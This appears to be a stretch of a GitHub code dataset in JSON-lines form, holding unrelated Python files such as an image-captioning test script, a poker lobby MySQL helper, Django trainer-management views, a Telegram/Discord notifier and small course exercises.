Vgg16Feats\nfrom evaluate import language_eval\n\n\ndef save_test_json(preds, resFile):\n print('Writing %d predictions' % (len(preds)))\n json.dump(preds, open(resFile, 'w')) \n\ndef test(args, split, modelfn=None, model_convcap=None, model_imgcnn=None):\n \"\"\"Runs test on split=val/test with checkpoint file modelfn or loaded model_*\"\"\"\n\n t_start = time.time()\n data = coco_loader(args.coco_root, split=split, ncap_per_img=1)\n print('[DEBUG] Loading %s data ... %f secs' % (split, time.time() - t_start))\n\n data_loader = DataLoader(dataset=data, num_workers=args.nthreads,\\\n batch_size=args.batchsize, shuffle=False, drop_last=True)\n\n batchsize = args.batchsize\n max_tokens = data.max_tokens\n num_batches = np.int_(np.floor((len(data.ids)*1.)/batchsize))\n print('[DEBUG] Running inference on %s with %d batches' % (split, num_batches))\n\n if(modelfn is not None):\n model_imgcnn = Vgg16Feats()\n model_imgcnn.cuda() \n\n model_convcap = convcap(data.numwords, args.num_layers, is_attention=args.attention)\n model_convcap.cuda()\n\n print('[DEBUG] Loading checkpoint %s' % modelfn)\n checkpoint = torch.load(modelfn)\n model_convcap.load_state_dict(checkpoint['state_dict'])\n model_imgcnn.load_state_dict(checkpoint['img_state_dict'])\n else:\n model_imgcnn = model_imgcnn\n model_convcap = model_convcap\n\n model_imgcnn.train(False) \n model_convcap.train(False)\n\n pred_captions = []\n #Test epoch\n for batch_idx, (imgs, _, _, _, img_ids) in \\\n tqdm(enumerate(data_loader), total=num_batches):\n \n imgs = imgs.view(batchsize, 3, 224, 224)\n\n imgs_v = Variable(imgs.cuda())\n imgsfeats, imgsfc7 = model_imgcnn(imgs_v)\n _, featdim, feat_h, feat_w = imgsfeats.size()\n \n wordclass_feed = np.zeros((batchsize, max_tokens), dtype='int64')\n wordclass_feed[:,0] = data.wordlist.index('') \n\n outcaps = np.empty((batchsize, 0)).tolist()\n\n for j in range(max_tokens-1):\n wordclass = Variable(torch.from_numpy(wordclass_feed)).cuda()\n\n wordact, _ = model_convcap(imgsfeats, imgsfc7, wordclass)\n\n wordact = wordact[:,:,:-1]\n wordact_t = wordact.permute(0, 2, 1).contiguous().view(batchsize*(max_tokens-1), -1)\n\n wordprobs = F.softmax(wordact_t).cpu().data.numpy()\n wordids = np.argmax(wordprobs, axis=1)\n\n for k in range(batchsize):\n word = data.wordlist[wordids[j+k*(max_tokens-1)]]\n outcaps[k].append(word)\n if(j < max_tokens-1):\n wordclass_feed[k, j+1] = wordids[j+k*(max_tokens-1)]\n\n for j in range(batchsize):\n num_words = len(outcaps[j]) \n if 'EOS' in outcaps[j]:\n num_words = outcaps[j].index('EOS')\n outcap = ' '.join(outcaps[j][:num_words])\n pred_captions.append({'image_id': img_ids[j], 'caption': outcap})\n\n scores = language_eval(pred_captions, args.model_dir, split)\n\n model_imgcnn.train(True) \n model_convcap.train(True)\n\n return scores \n \n","repo_name":"aditya12agd5/convcap","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"5"} +{"seq_id":"10169930972","text":"from datetime import datetime\nimport mysql.connector\n\n\n\nclass DatabaseInteraction:\n def __init__(self):\n self.config = {\n \"user\": \"root\",\n \"password\": \"Password66\",\n \"host\": \"127.0.0.1\",\n \"database\": \"poker_game\"\n }\n\n def get_username(self, user_id):\n try:\n connection = mysql.connector.connect(**self.config)\n cursor = connection.cursor()\n\n # Retrieve hashed_password and salt from the database for the given username\n cursor.execute(\"SELECT username FROM users WHERE user_id = %s\", (user_id,))\n username = cursor.fetchone()[0]\n\n return username\n except Exception as e:\n print(f\"Error: {e}\")\n return \"Invalid\"\n finally:\n if connection.is_connected():\n cursor.close()\n connection.close()\n\n def get_all_lobbies(self, status_filter, odds_filter):\n try:\n connection = mysql.connector.connect(**self.config)\n cursor = connection.cursor()\n\n # Modify the SQL query to also get the count of players in each lobby\n cursor.execute(\"\"\"\n SELECT l.lobby_id, l.name, l.status, COUNT(pl.user_id), l.created_at, l.show_odds\n FROM lobbies l\n LEFT JOIN player_lobbies pl ON l.lobby_id = pl.lobby_id\n WHERE l.status = %s AND l.show_odds = %s\n GROUP BY l.lobby_id\n \"\"\", (status_filter, odds_filter))\n\n lobbies = cursor.fetchall()\n\n return [{\n 'lobby_id': lobby[0],\n 'name': lobby[1],\n 'status': lobby[2],\n 'player_count': lobby[3],\n 'created_at': lobby[4].strftime('%Y-%m-%d %H:%M:%S'), # Convert datetime to string\n 'show_odds': lobby[5]\n } for lobby in lobbies]\n\n except Exception as e:\n print(f\"Error: {e}\")\n return []\n finally:\n if connection.is_connected():\n cursor.close()\n connection.close()\n\n def create_lobby(self, lobby_data):\n response = {\"success\": True, \"error\": None}\n try:\n connection = mysql.connector.connect(**self.config)\n cursor = connection.cursor()\n\n sql = \"\"\"\n INSERT INTO lobbies (host_user_id, name, status, show_odds)\n VALUES (%s, %s, %s, %s)\n \"\"\"\n cursor.execute(sql, (lobby_data['host_user_id'], lobby_data['name'], 'waiting', lobby_data['show_odds']))\n connection.commit()\n\n except mysql.connector.IntegrityError as e:\n response[\"success\"] = False\n response[\"error\"] = \"A lobby with this name already exists\"\n except Exception as e:\n response[\"success\"] = False\n response[\"error\"] = f\"Error: {e}\"\n finally:\n if connection.is_connected():\n cursor.close()\n connection.close()\n\n return response\n\n def join_lobby(self, user_id, lobby_name):\n response = {\"success\": True, \"error\": None}\n try:\n connection = mysql.connector.connect(**self.config)\n cursor = connection.cursor()\n\n # Update the lobby to include the new player\n sql = \"\"\"INSERT INTO player_lobbies (user_id, lobby_id) VALUES (%s, (SELECT lobby_id FROM lobbies WHERE \n name = %s))\"\"\"\n cursor.execute(sql, (user_id, lobby_name))\n connection.commit()\n\n except Exception as e:\n response[\"success\"] = False\n response[\"error\"] = f\"Error: {e}\"\n finally:\n if connection.is_connected():\n cursor.close()\n connection.close()\n\n return response[\"success\"], response[\"error\"]\n\n def remove_player_from_lobby(self, user_id, lobby_name):\n try:\n connection = mysql.connector.connect(**self.config)\n cursor = connection.cursor()\n\n query = \"DELETE FROM player_lobbies WHERE user_id = %s AND lobby_id = (SELECT lobby_id FROM lobbies WHERE name = %s)\"\n cursor.execute(query, (user_id, lobby_name))\n connection.commit()\n\n except Exception as e:\n print(f\"Error removing player from lobby database: {e}\")\n finally:\n if connection.is_connected():\n cursor.close()\n connection.close()\n\n\n","repo_name":"4wzy/Poker-NEA","sub_path":"logic/database_interaction.py","file_name":"database_interaction.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14568887976","text":"from collections import deque\n\n\nclass RaceBase(object):\n MAX_ROUNDS = 30\n\n def __init__(self, lanes, cars, rounds):\n self.rounds = min(rounds, self.MAX_ROUNDS)\n self.cars = cars\n self.lanes = lanes\n\n def generate_rounds(self):\n rounds = []\n for r in range(1, self.rounds + 1):\n rounds.append(self.generate_heats(r))\n return rounds\n\n def generate_heats(self, current_round):\n \"\"\"\n Create the heats for a single round.\n Should return a list of heats containing a the list of cars\n \"\"\"\n raise NotImplementedError\n\n def list_racer_opponent(self, rounds):\n racers = [[] for i in self.cars]\n for rd in rounds:\n for h in rd:\n for l in h:\n racers[l].extend(h)\n return racers\n\n def list_racer_lanes(self, rounds):\n totals = [[0 for j in self.lanes] for i in self.cars]\n for rd in rounds:\n for h in rd:\n for i, l in enumerate(h):\n totals[l][i] += 1\n return totals\n\n @staticmethod\n def chunks(l, n, rotate=0):\n c = []\n for i in range(0, len(l), n):\n d = deque(l[i:i+n])\n d.rotate(-rotate)\n c.append(list(d))\n return c","repo_name":"olsenb/derby_pi","sub_path":"derby/race/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8615196871","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nFor instance, let’s interpret the system from `example` as two oscillators (which is what it is), one consisting of the first and second and one of the third and fourth component. Furthermore, let’s change the control parameters a bit to make the two oscillators identical. We can then calculate the transversal Lyapunov exponents to the synchronisation manifold as follows (important changes are highlighted):\n\n.. literalinclude:: ../examples/double_fhn_transversal_lyap.py\n\t:emphasize-lines: 6, 12, 14, 17, 19-20\n\t:start-after: example-st\\u0061rt\n\t:dedent: 1\n\t:linenos:\n\nNote that the initial state (line 17) is reduced in dimensionality and there is only one component for each synchronisation group.\n\"\"\"\n\nif __name__ == \"__main__\":\n\t# example-start\n\tfrom jitcode import jitcode_transversal_lyap, y\n\tfrom scipy.stats import sem\n\timport numpy as np\n\t\n\ta = -0.025794\n\tb = 0.01\n\tc = 0.02\n\tk = 0.128\n\t\n\tf = [\n\t\ty(0) * ( a-y(0) ) * ( y(0)-1.0 ) - y(1) + k * (y(2) - y(0)),\n\t\tb*y(0) - c*y(1),\n\t\ty(2) * ( a-y(2) ) * ( y(2)-1.0 ) - y(3) + k * (y(0) - y(2)),\n\t\tb*y(2) - c*y(3)\n\t\t]\n\t\n\tinitial_state = np.array([1.,2.])\n\t\n\tgroups = [ [0,2], [1,3] ]\n\tODE = jitcode_transversal_lyap(f, groups=groups)\n\tODE.set_integrator(\"lsoda\")\n\tODE.set_initial_value(initial_state,0.0)\n\t\n\ttimes = range(10,100000,10)\n\tlyaps = []\n\tfor time in times:\n\t\tlyaps.append(ODE.integrate(time)[1])\n\t\n\tlyap = np.average(lyaps[1000:])\n\tstderr = sem(lyaps[1000:]) # Note that this only an estimate\n\tprint(\"transversal Lyapunov exponent: % .4f ± %.4f\" % (lyap,stderr))\n\n","repo_name":"neurophysik/jitcode","sub_path":"examples/double_fhn_transversal_lyap.py","file_name":"double_fhn_transversal_lyap.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"5"} +{"seq_id":"38907133722","text":"# -*- coding: utf-8 -*-\n#########################################################\n\nimport os\nimport traceback\n\nfrom discord_webhook import DiscordWebhook, DiscordEmbed\nfrom telepot2 import Bot, glance\nfrom telepot2.loop import MessageLoop\n\nfrom . import logger\n\nclass ToolBaseNotify(object):\n\n @classmethod\n def send_message(cls, text, message_id=None, image_url=None):\n from system.model import ModelSetting as SystemModelSetting\n if SystemModelSetting.get_bool('notify_advaned_use'):\n return cls.send_advanced_message(text, image_url=image_url, message_id=message_id)\n else:\n if SystemModelSetting.get_bool('notify_telegram_use'):\n cls.send_telegram_message(text, image_url=image_url, bot_token=SystemModelSetting.get('notify_telegram_token'), chat_id=SystemModelSetting.get('notify_telegram_chat_id'))\n if SystemModelSetting.get_bool('notify_discord_use'):\n cls.send_discord_message(text, image_url=image_url, webhook_url=SystemModelSetting.get('notify_discord_webhook')) \n\n @classmethod\n def send_advanced_message(cls, text, image_url=None, policy=None, message_id=None):\n from system.model import ModelSetting as SystemModelSetting\n try:\n if policy is None:\n policy = SystemModelSetting.get('notify_advaned_policy')\n\n if message_id is None:\n message_id = 'DEFAULT'\n \n policy_list = cls._make_policy_dict(policy)\n #logger.debug(policy_list)\n #logger.debug(message_id)\n if message_id.strip() not in policy_list:\n message_id = 'DEFAULT'\n \n for tmp in policy_list[message_id.strip()]:\n if tmp.startswith('http'):\n cls.send_discord_message(text, image_url=image_url, webhook_url=tmp)\n elif tmp.find(',') != -1:\n tmp2 = tmp.split(',')\n cls.send_telegram_message(text, image_url=image_url, bot_token=tmp2[0], chat_id=tmp2[1])\n return True\n except Exception as exception: \n logger.error('Exception:%s', exception)\n logger.error(traceback.format_exc()) \n #logger.debug('Chatid:%s', chat_id)\n return False\n\n @classmethod\n def _make_policy_dict(cls, policy):\n try:\n ret = {}\n for t in policy.split('\\n'):\n t = t.strip()\n if t == '' or t.startswith('#'):\n continue\n else:\n tmp2 = t.split('=')\n if len(tmp2) != 2:\n continue\n ret[tmp2[0].strip()] = [x.strip() for x in tmp2[1].split('|')]\n return ret\n except Exception as exception: \n logger.error('Exception:%s', exception)\n logger.error(traceback.format_exc()) \n return False\n\n @classmethod\n def send_discord_message(cls, text, image_url=None, webhook_url=None):\n from system.model import ModelSetting as SystemModelSetting\n try:\n if webhook_url is None:\n webhook_url = SystemModelSetting.get('notify_discord_webhook')\n \n webhook = DiscordWebhook(url=webhook_url, content=text)\n if image_url is not None:\n embed = DiscordEmbed()\n embed.set_timestamp()\n embed.set_image(url=image_url)\n webhook.add_embed(embed)\n response = webhook.execute()\n #discord = response.json()\n #logger.debug(discord)\n return True\n except Exception as exception: \n logger.error('Exception:%s', exception)\n logger.error(traceback.format_exc()) \n return False\n\n @classmethod\n def send_telegram_message(cls, text, bot_token=None, chat_id=None, image_url=None, disable_notification=None):\n from system.model import ModelSetting as SystemModelSetting\n try:\n if bot_token is None:\n bot_token = SystemModelSetting.get('notify_telegram_token')\n \n if chat_id is None:\n chat_id = SystemModelSetting.get('notify_telegram_chat_id')\n\n if disable_notification is None:\n disable_notification = SystemModelSetting.get_bool('notify_telegram_disable_notification')\n\n bot = Bot(bot_token)\n if image_url is not None:\n #bot.sendPhoto(chat_id, text, caption=caption, disable_notification=disable_notification)\n bot.sendPhoto(chat_id, image_url, disable_notification=disable_notification)\n bot.sendMessage(chat_id, text, disable_web_page_preview=True, disable_notification=disable_notification)\n #elif mime == 'video':\n # bot.sendVideo(chat_id, text, disable_notification=disable_notification)\n return True\n except Exception as exception: \n logger.error('Exception:%s', exception)\n logger.error(traceback.format_exc()) \n logger.debug('Chatid:%s', chat_id)\n return False\n\n","repo_name":"soju6jan/SJVA3","sub_path":"lib/tool_base/notify.py","file_name":"notify.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"5"} +{"seq_id":"32021139726","text":"import datetime\nfrom datetime import date\nfrom django.shortcuts import render\nfrom .models import Client, Team, Trainer, Activity, Sport, News, TrainerStatus\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.shortcuts import get_object_or_404\nimport json\nfrom django.db.models import Q\nfrom django.utils import timezone\nfrom django.db.models import Count\n\n\n\ndef login_page(request):\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse('main'))\n else:\n return render(request, 'trainers/login.html')\n\n\ndef log_in(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse('login_page'))\n else:\n return HttpResponseRedirect(reverse('main'))\n\n\ndef log_out(request):\n logout(request)\n return HttpResponseRedirect(reverse('login_page'))\n\n\n\ndef main(request):\n if request.user.is_authenticated:\n news = News.objects.filter(pub_date__lte=timezone.now(), expiry_date__gt=timezone.now())\n\n user = request.user\n try:\n trainer = Trainer.objects.get(user=user)\n is_trainer = True\n except Trainer.DoesNotExist:\n trainer = None\n is_trainer = False\n context = {'userinfo': user, 'trainer': trainer, 'is_trainer': is_trainer, 'news': news}\n return render(request, 'trainers/main.html', context)\n else:\n return HttpResponseRedirect(reverse('login_page'))\n\n\ndef clients(request):\n if request.user.is_authenticated:\n clients = Client.objects.all()\n teams = Team.objects.all()\n\n sports = Sport.objects.annotate(team_count=Count('team'))\n\n\n context = {'clients': clients, 'teams': teams, 'sports': sports}\n\n return render(request, \"trainers/clients.html\", context)\n else:\n return HttpResponseRedirect(reverse('login_page'))\n\ndef client_info(request, client_id):\n if request.user.is_authenticated:\n client = get_object_or_404(Client, pk=client_id)\n adr = client.address_set.all()\n context = {'client': client, 'adr': adr}\n return render(request, \"trainers/clients_info.html\", context)\n else:\n return HttpResponseRedirect(reverse('login_page'))\n\n\ndef client_add_action(request):\n client_name = request.POST['client_name']\n client_surname = request.POST['client_surname']\n client_birthdate = request.POST['client_birthdate']\n try:\n Client.objects.create(first_name=client_name, last_name=client_surname, birth_date=client_birthdate)\n return HttpResponseRedirect(reverse('clients'))\n except:\n return HttpResponseRedirect(reverse('client_add'))\n\n\ndef teams(request):\n if request.user.is_authenticated:\n team = Team.objects.all()\n context = {'teams': team}\n return render(request, \"trainers/teams.html\", context)\n else:\n return HttpResponseRedirect(reverse('login_page'))\n\n\ndef team_add_action(request):\n team_name = request.POST['name']\n members = request.POST.getlist('members')\n trainer = request.POST['trainer']\n date_end = request.POST['date_end']\n days = request.POST.getlist('days')\n act_begin_time = request.POST['act_begin_time']\n act_end_time = request.POST['act_end_time']\n price = request.POST['price']\n sport = request.POST['sport']\n try:\n tr = get_object_or_404(Trainer, pk=trainer)\n team = Team.objects.create(name=team_name, trainer=tr)\n for client in members:\n team.clients.add(client)\n\n date1 = datetime.date.today()\n date2 = datetime.datetime.strptime(date_end, '%Y-%m-%d')\n\n while date1 <= date2.date():\n if str(date1.weekday()) in days:\n act = Activity(act_date=date1, act_time_begin=act_begin_time,\n act_time_end=act_end_time, trainer=tr, price=price)\n act.save()\n for client in members:\n act.clients.add(client)\n act.save()\n date1 = date1 + datetime.timedelta(days=1)\n\n return HttpResponseRedirect(reverse('teams'))\n except:\n return HttpResponseRedirect(reverse('team_add'))\n\n\ndef trainers(request):\n if request.user.is_authenticated:\n trainers = Trainer.objects.all()\n sport = Sport.objects.all()\n status = TrainerStatus.objects.all()\n\n if request.GET.get('status'):\n trainers = trainers.filter(status__name=request.GET.get('status'))\n\n if request.GET.get('sports'):\n trainers = trainers.filter(sports__name=request.GET.get('sports'))\n\n\n\n today = date.today()\n trainers_birth = Trainer.objects.all().order_by('birthdate')\n upcoming_birthdays = []\n today_birthdays = []\n for trainer in trainers_birth:\n #дата> рождения тренера в этом году\n birthdate_this_year = date(today.year, trainer.birthdate.month, trainer.birthdate.day)\n if birthdate_this_year < today:\n birthdate_this_year = date(today.year + 1, trainer.birthdate.month, trainer.birthdate.day)\n #оставшееся время до дня рождения\n time_to_birthday = (birthdate_this_year - today).days\n if time_to_birthday <= 7 & time_to_birthday != 0:\n upcoming_birthdays.append(trainer)\n if time_to_birthday == 0:\n today_birthdays.append(trainer)\n trainers_search = []\n query = request.GET.get('q')\n if query:\n trainers_search = Trainer.objects.filter(Q(user__first_name__icontains=query) | Q(user__email__icontains=query))\n\n context = {'trainers': trainers, 'status': status, 'sport': sport, 'upcoming_birthdays': upcoming_birthdays, 'today_birthdays': today_birthdays, 'trainers_search': trainers_search, 'query': query}\n\n return render(request, \"trainers/trainers.html\", context)\n else:\n return HttpResponseRedirect(reverse('login_page'))\n\n\n\ndef trainers_add_action(request):\n trainer_name = request.POST['name']\n trainer_last_name = request.POST['last_name']\n trainer_otchestv = request.POST['otchestv']\n trainer_mail = request.POST['mail']\n trainer_pass = request.POST['password']\n trainer_birthdate = request.POST['birth_date']\n try:\n user = User.objects.create_user(username=trainer_mail, email=trainer_mail, password=trainer_pass)\n user.last_name = trainer_last_name\n user.first_name = trainer_name\n user.save()\n print('user created')\n trainer = Trainer(user=user, otchestv=trainer_otchestv, birthdate=trainer_birthdate)\n trainer.save()\n return HttpResponseRedirect(reverse('trainers'))\n except:\n return HttpResponseRedirect(reverse('trainers'))\n#\n# def activity(request):\n# if request.user.is_authenticated:\n# activity_list = Activity.objects.all()\n# context = {'activities': activity_list}\n# return render(request, \"trainers/schedule.html\", context)\n# else:\n# return HttpResponseRedirect(reverse('login_page'))\n#\n#\n# def activity_info(request, activity_id):\n# if request.user.is_authenticated:\n# act = get_object_or_404(Activity, pk=activity_id)\n# clients = act.clients.all()\n# context = {'act': act, 'clients': clients}\n# return render(request, \"trainers/act_info.html\", context)\n# else:\n# return HttpResponseRedirect(reverse('login_page'))\n#\n#\n# def activity_change(request, activity_id):\n# status = request.POST['status']\n# client_who_was = request.POST.getlist('client')\n# act = get_object_or_404(Activity, pk=activity_id)\n# try:\n# if status == \"Состоится\":\n# for id in client_who_was:\n# client = get_object_or_404(Client, pk=id)\n# client.balance = client.balance - act.price\n# client.save()\n# act.status = status\n# act.save()\n# elif status == \"Отменено\":\n# act.status = status\n# act.save()\n# return HttpResponseRedirect(reverse('activity'))\n# except:\n# return HttpResponseRedirect(reverse('activity'))\n\n\ndef schedule(request):\n if request.user.is_authenticated:\n activities = Activity.objects.all()\n context = [activity.to_json() for activity in activities]\n context = json.dumps(context)\n return render(request, \"trainers/schedule.html\", {'activities': context})\n else:\n return HttpResponseRedirect(reverse('login_page'))\n","repo_name":"Tangusik/test","sub_path":"trainers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25178438966","text":"import pygame\r\nimport Events\r\n\r\nfrom Button import Button\r\nfrom CheckBox import CheckBox\r\nfrom Slider import Slider\r\nfrom TextField import TextField\r\n\r\nclass Interface(object):\r\n\r\n def __init__(self):\r\n self.buttons = list()\r\n self.checkBoxes = dict()\r\n self.sliders = dict()\r\n self.textFields = dict()\r\n\r\n def addButton(self, index, iconPath, x, y, active=True, visible=True, mask=None):\r\n newButton = Button(index, iconPath, x, y, active, visible, mask)\r\n newButton.updateHover()\r\n\r\n self.buttons.append(newButton)\r\n\r\n def addCheckBox(self, tag, iconPath, x, y, checked=False, active=True, visible=True, mask=None):\r\n newCheckBox = CheckBox(iconPath, x, y, checked, active, visible, mask)\r\n newCheckBox.updateHover()\r\n\r\n self.checkBoxes[tag] = newCheckBox\r\n\r\n def addSlider(self, tag, icon, mask, boundaries, default, x, y, vertical=False, active=True, visible=True):\r\n newSlider = Slider(icon, mask, boundaries, default, x, y, vertical, active, visible)\r\n newSlider.updateHover()\r\n\r\n self.sliders[tag] = newSlider\r\n\r\n def addTextField(self, tag, image, x, y, color=0xFFFFFF, size=16, text=\"\", focused=False, active=True, visible=True, mask=None):\r\n newTextField = TextField(image, x, y, color, size, text, focused, active, visible, mask)\r\n newTextField.updateHover()\r\n\r\n self.textFields[tag] = newTextField\r\n\r\n def boxChecked(self, tag):\r\n return self.checkBoxes[tag].checked\r\n\r\n def getSliderValue(self, tag):\r\n return self.sliders[tag].value\r\n\r\n def getText(self, tag):\r\n return self.textFields[tag].text\r\n\r\n def handle(self, event):\r\n output = list()\r\n\r\n for tf in self.textFields.values():\r\n tf.inputText(event)\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n for i in self.buttons + self.checkBoxes.values() + self.sliders.values() + self.textFields.values():\r\n i.clickDown()\r\n\r\n if event.type == pygame.MOUSEBUTTONUP:\r\n for b in self.buttons:\r\n if b.clickUp(): output.append(Events.ButtonClicked(b.index))\r\n\r\n for cb in self.checkBoxes.values():\r\n cb.clickUp()\r\n\r\n for s in self.sliders.values():\r\n s.clickUp()\r\n\r\n for tf in self.textFields.values():\r\n tf.clickUp()\r\n\r\n hoverMode = Events.NOHOVER\r\n\r\n for i in self.buttons + self.checkBoxes.values() + self.sliders.values():\r\n if i.updateHover(): hoverMode = Events.CLICKHOVER\r\n\r\n for i in self.textFields.values():\r\n if i.updateHover(): hoverMode = Events.TEXTHOVER\r\n\r\n output.append(Events.Hover(hoverMode))\r\n\r\n return output\r\n\r\n def draw(self, display, offset=(0, 0)):\r\n for b in self.buttons:\r\n pos = b.getDrawPos()\r\n pos[0] -= offset[0]\r\n pos[1] -= offset[1]\r\n\r\n display.blit(b.getIcon(), pos)\r\n\r\n for cb in self.checkBoxes.values():\r\n pos = cb.getDrawPos()\r\n pos[0] -= offset[0]\r\n pos[1] -= offset[1]\r\n\r\n display.blit(cb.getIcon(), pos)\r\n\r\n for s in self.sliders.values():\r\n pos = s.getDrawPos()\r\n pos[0] -= offset[0]\r\n pos[1] -= offset[1]\r\n\r\n display.blit(s.getIcon(), pos)\r\n\r\n for tf in self.textFields.values():\r\n pos = tf.getDrawPos()\r\n pos[0] -= offset[0]\r\n pos[1] -= offset[1]\r\n\r\n display.blit(tf.getIcon(), pos)\r\n","repo_name":"vctandrade/Backyard-Knight","sub_path":"graphics/userInterface/Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"8215306850","text":"from ironic.common import exception\nfrom ironic.common import states\nfrom ironic.drivers import base as driver_base\nfrom ironic.drivers import fake\nfrom ironic.tests import base\nfrom ironic.tests.db import utils as db_utils\n\n\nclass FakeDriverTestCase(base.TestCase):\n\n def setUp(self):\n super(FakeDriverTestCase, self).setUp()\n self.driver = fake.FakeDriver()\n self.node = db_utils.get_test_node()\n\n def test_driver_interfaces(self):\n # fake driver implements only 3 out of 5 interfaces\n self.assertIsInstance(self.driver.power, driver_base.PowerInterface)\n self.assertIsInstance(self.driver.deploy, driver_base.DeployInterface)\n self.assertIsInstance(self.driver.vendor, driver_base.VendorInterface)\n self.assertIsNone(self.driver.rescue)\n self.assertIsNone(self.driver.console)\n\n def test_power_interface(self):\n self.driver.power.validate(self.node)\n self.driver.power.get_power_state(None, self.node)\n self.driver.power.set_power_state(None, None, states.NOSTATE)\n self.driver.power.reboot(None, None)\n\n def test_deploy_interface(self):\n self.driver.deploy.validate(self.node)\n self.driver.deploy.deploy(None, None)\n self.driver.deploy.tear_down(None, None)\n\n def test_vendor_interface(self):\n info = {'method': 'foo',\n 'bar': 'baz'}\n self.assertTrue(self.driver.vendor.validate(self.node, **info))\n self.assertTrue(self.driver.vendor.vendor_passthru(None,\n self.node['uuid'], **info))\n # no method\n self.assertRaises(exception.InvalidParameterValue,\n self.driver.vendor.validate,\n self.node, bar='baz')\n","repo_name":"citrix-openstack-build/ironic","sub_path":"ironic/tests/drivers/test_fake.py","file_name":"test_fake.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"14456583162","text":"import sys\nimport operator\n\nOPS = {\n '+' : operator.add,\n '-' : operator.sub,\n '*' : operator.mul,\n '/' : operator.floordiv,\n}\n\nclass Stack:\n def __init__(self) -> None:\n self.items = []\n\n def push(self, item) -> None:\n self.items.append(int(item))\n\n def pop(self) -> int:\n return self.items.pop()\n \n def peek(self) -> None:\n return self.items[-1]\n\n\ndef calc(item_1, oper, item_2) -> int:\n return OPS[oper](item_1, item_2)\n\n\ndef main() -> None:\n stack = Stack()\n stroka = sys.stdin.readline().rstrip().split()\n for i in stroka:\n if i in OPS.keys():\n item_2 = stack.pop() \n item_1 = stack.pop()\n res = calc(item_1, i, item_2)\n stack.push(res)\n else:\n stack.push(i)\n print(stack.peek())\n \n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MihaFedo/Algorithms_and_data_structures","sub_path":"sprint_12/final/f_12_2.py","file_name":"f_12_2.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23939841724","text":"from .indicators_service import IndicatorsService\nfrom .banxico_parser import BanxicoParser\nfrom zeep import Client, Transport\n\nimport requests\n\n\nWSDL = 'http://www.banxico.org.mx/DgieWSWeb/DgieWS?wsdl'\n\n\nclass BanxicoService(IndicatorsService):\n def __init__(self, logger):\n self._logger = logger\n self._parser = BanxicoParser()\n try:\n self._session = requests.Session()\n self._client = Client(WSDL, transport=Transport(session=self._session))\n except Exception as ex:\n self._session = None\n self._client = None\n self._logger.error(ex)\n\n def __enter__(self):\n return self\n\n def get_exchange_rates(self):\n assert self._session and self._client, 'Banxico communication failed'\n\n response = self._client.service.tiposDeCambioBanxico()\n return self._parser.parse(response)\n\n def close(self):\n if(self._session):\n self._session.close()\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.close()\n","repo_name":"xxlxii/kelvin","sub_path":"kelvin/siblings/data/banxico_service.py","file_name":"banxico_service.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38348339927","text":"def falling(n, k):\n \"\"\"Compute the falling factorial of n to depth k.\n\n >>> falling(6, 3) # 6 * 5 * 4\n 120\n >>> falling(4, 3) # 4 * 3 * 2\n 24\n >>> falling(4, 1) # 4\n 4\n >>> falling(4, 0)\n 1\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n result, curr, i = 1, n, 0\n while i < k:\n curr = n - i\n result = result * curr\n i += 1\n return result\n\n\n\ndef sum_digits(y):\n \"\"\"Sum all the digits of y.\n\n >>> sum_digits(10) # 1 + 0 = 1\n 1\n >>> sum_digits(4224) # 4 + 2 + 2 + 4 = 12\n 12\n >>> sum_digits(1234567890)\n 45\n >>> a = sum_digits(123) # make sure that you are using return rather than print\n >>> a\n 6\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n next, curr, sum = y, 0, 0\n while next > 0:\n curr = next % 10\n sum += curr\n next = next // 10\n return sum\n\n\n\ndef double_eights(n):\n \"\"\"Return true if n has two eights in a row.\n >>> double_eights(8)\n False\n >>> double_eights(88)\n True\n >>> double_eights(2882)\n True\n >>> double_eights(880088)\n True\n >>> double_eights(12345)\n False\n >>> double_eights(80808080)\n False\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n next, curr, last = n, 0, 0\n while next > 0:\n curr = next % 10\n if curr == 8 and curr == last:\n return True\n next = next // 10\n last = curr\n return False \n\n","repo_name":"hello2333/cs-course","sub_path":"cs61a/lab/lab01/lab01.py","file_name":"lab01.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36622021574","text":"from django.conf.urls.defaults import *\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n (r'^admin/doc/', include('django.contrib.admindocs.urls')),\n (r'^admin/', include(admin.site.urls)),\n 